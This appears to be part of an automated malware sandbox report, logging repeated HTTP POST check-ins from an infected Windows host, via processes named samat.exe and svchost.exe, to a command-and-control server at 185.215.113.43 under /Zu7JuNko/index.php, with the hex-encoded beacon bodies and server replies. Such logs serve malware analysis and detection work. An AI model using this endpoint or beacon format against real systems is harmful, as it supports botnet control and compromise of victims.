                                                                                                                                                                                                                                                                                    114192.168.2.550157185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:57.383908987 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:58.767621040 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    115192.168.2.550158185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:00.401072979 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:01.783226967 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    116192.168.2.550159185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:03.521878958 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:04.909271955 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:04 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    117192.168.2.550160185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:06.553194046 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:07.923322916 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    118192.168.2.550161185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:09.662390947 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:11.043358088 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:10 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    119192.168.2.550162185.215.113.43803952C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:12.686312914 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:14.072290897 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:13 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    120192.168.2.550163185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:15.819608927 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:17.199826956 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:16 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    121192.168.2.550164185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:18.839622974 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:20.217869043 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:19 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    122192.168.2.550166185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:24.945606947 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:26.386147022 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    123192.168.2.550167185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:28.132998943 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:29.517551899 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    124192.168.2.550168185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:31.298717022 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:32.684037924 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    125192.168.2.550169185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:34.413959980 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:35.790955067 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    126192.168.2.550170185.215.113.43803952C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:37.436423063 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:38.838113070 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    127192.168.2.550172185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:40.585402012 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:41.932939053 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    128192.168.2.550173185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:43.572046995 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:44.999707937 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    129192.168.2.550174185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:46.741942883 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:48.081738949 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:19:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    130192.168.2.550175185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.709903955 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
